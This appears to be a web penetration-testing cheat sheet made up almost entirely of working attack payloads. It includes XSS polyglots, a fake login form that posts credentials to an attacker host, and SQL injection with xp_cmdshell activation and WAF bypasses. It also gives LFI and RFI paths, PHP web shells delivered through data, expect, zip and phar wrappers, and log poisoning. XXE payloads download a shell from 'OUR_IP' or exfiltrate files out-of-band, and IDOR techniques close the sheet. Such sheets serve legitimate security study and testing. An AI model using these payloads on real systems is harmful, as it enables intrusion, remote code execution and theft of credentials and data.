Part 1
Last updated
Last updated
Tools like smuggler.py (Python) can be used to identify potential HTTP request smuggling vulnerabilities.
Code | Description |
---|---|
Serve XSS 𝙥𝙖𝙮𝙡𝙤𝙖𝙙 from a XML file
<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>
Sample XSS Polyglot
'"onclick=(co\u006efirm)?.`0`><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)`1`"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//ChiragXSS.xSs.ht></scripT>
How to perform basic Login Form Injection via Reflected XSS
Step 1: Test vulnerable form for the remove function by running script in console (Dev-Tools)
document.getElementById('urlform').remove();
Step 2: Inject form into webpage with XSS payload by executing the below script into console (Dev-tools)
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
After successfully authenticating to a SQL Server It is worth a shot to verify if xp_cmdshell has been previously activated with:\
EXEC xp_cmdshell 'net user';
If xp_cmdshell has not been activated, run the below commands to activate and utilize Windows XP cmd commands within SQL:
# The command below enables sp_configure
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE; sp_configure;
message EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Basic SQL Testing
WAF BYPASSES
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
Passwords
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password),6 FroM users
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password,0x3a,flag),6 FroM users
LFI via this path does not work at first
/fileRead.jsp?fileName=/etc/passwd (406)
But after replacing character with ? you may receive a successful response (200)
/fileRead.jsp?fileName=/?tc/?asswd (200)
fileRead.jsp?fileName=/??c/??sswd (200)
# Fuff
ffuf -w $SECLISTS/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-Jhaddix.txt
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt
https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/File%20Inclusion/#basic-lfi
# Basic LFI
/etc/passwd
# Path Traversal
../../../../../../etc/passwd
# When / is filtered
....//....//....//....//etc/passwd
# Other Techniques
....////
# Path Truncation
echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done
# Null Bytes
../../../../../../etc/passwd%00
php://filter/read=convert.base64-encode/resource=config
Data Wrapper
The data wrapper is only available to use if the (allow_url_include) setting is enabled in the PHP configurations.
# Check PHP Config
/etc/php/X.Y/apache2/php.ini
# Check allow_url_Include Enabled
php.ini | grep allow_url_include
# Remote Code Execution
echo '<?php system($_GET["cmd"]); ?>' | base64
data://text/plain;base64,<base64>&cmd=id
Input Wrapper
Must accept POST requests for this attack to work. The input wrapper also depends on the allow_url_include setting
# Gaining Remote Code Execution
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
Expect Wrapper
# Check PHP Config
/etc/php/X.Y/apache2/php.ini
# Check allow_url_Include Enabled
php.ini | grep expect
# Gaining Remote Code Execution
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
# Verify RFI
cat php.ini | grep allow_url_include
# RFI File
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Host File
sudo python3 -m http.server 8000
# Execute Command
/shell.php&cmd=id
# Create RCE File
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
# Execute Command
./profile_images/shell.gif&cmd=id
# Create Malicous ZIP File
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
# Execute Command
zip://./profile_images/shell.jpg%23shell.php&cmd=id
# Create Malicous PHP File
## Shell.php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
# Compile PHP -> Phar
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
# Execute Command
phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
# Check PHP Session Cookie
/var/lib/php/sessions/sess_<your_session_id>
# Poison Log
/var/lib/php/sessions/%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
# RCE
/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
# Default Location Apache
/var/log/apache2/access.log
/var/log/apache2/error.log
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
# Default Location Nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
C:\nginx\log\access.log
C:\nginx\log\error.log
# Inject Into User-Agent Header
User-Agent: <?php system($_GET["cmd"]); ?>
# Code Execution
/var/log/apache2.log&cmd=id
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
Find and replace IDs
in urls, headers and body : /users/01
=> /users/02
Try Parameter Pollution: users=01
=> users=01&users=02
Special Characters: /users/01*
or /users/*
=> Disclosure of every single user
Try Older versions of API endpoints: /api/v3/users/01
=> /api/v1/users/02
Add extension: /users/01
=> /users/02.json
Change Request Methods: POST /users/01 => GET, PUT, PATCH, DELETE, OPTIONS,
etc
Check if Referer or other Headers are used to validate IDs:
Encrypted IDs: If application is using encrypted IDs, try to decrypt using hashing/cracking tool
Send wildcard {""user_id"":""*""}
Send ID twice URL?id=&id=
JSON wrap {“id”:111} --> {“id”:{“id”:111}}
Wrap ID with an array {“id”:111} --> {“id”:[111]}
Swap GUID with Numeric ID or email:
/users/XXXXXXXX-XXXX-XXXX-XXXXXXXXXXXX
=> /users/02
or /users/a@b.com
Try GUIDs such as:
00000000-0000-0000-000000000000
and 11111111-1111-1111-111111111111
GUID Enumeration: Try to disclose GUIDs using Google Dorks
, Github
, Wayback
, Burp history
If none of the GUID Enumeration methods work then try: SignUp
, Reset Password
, and other endpoints
and analyze the responses. An endpoint may disclose user's GUID within the application.
When a server responds with a 401/403, the action may still be performed. Ensure to verify the function within the application.
Blind IDORs: Look for endpoints/features that may disclose information
Chain IDOR with XSS for Account Takeovers\
Send Post request with path to xml file for exploitation
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php
OR Use a script to send payload: curl.sh
#!/bin/bash
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php
ID.xml
<!--ID command example-->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
<subject>&xxe;</subject>
<category>Clothing</category>
<text>New Shoes</text>
</entry>
Read Robots.txt (Base 64)
<!--Base64 response example-->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/respource=http://vulnerable site/" >]>
<entry>
<subject>&xxe;</subject>
<category>Clothing</category>
<text>New Shoes</text>
</entry>
<!DOCTYPE email [
<!ENTITY read SYSTEM "file:///etc/passwd">
]>
<!DOCTYPE email [
<!ENTITY read SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
# Create RCE Shell
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
# XXE Injection
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
Exfiltration with CDATA
# Create DTD File
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
# Upload XXE
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd">
%xxe;
]>
...
<email>&joined;</email>
Error Based XXE
# DTD File
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
# Upload XXE
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%error;
]>
Out of Band Data Exfiltration
# DTD File
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
# PHP Server Setup
?php
if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}
?>
# Run PHP Server
php -S 0.0.0.0:8000
# XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>
Command | Description |
---|---|
Command | Description |
---|---|
Payload | Description |
---|---|
Command | Description |
---|---|
Command | Description |
---|---|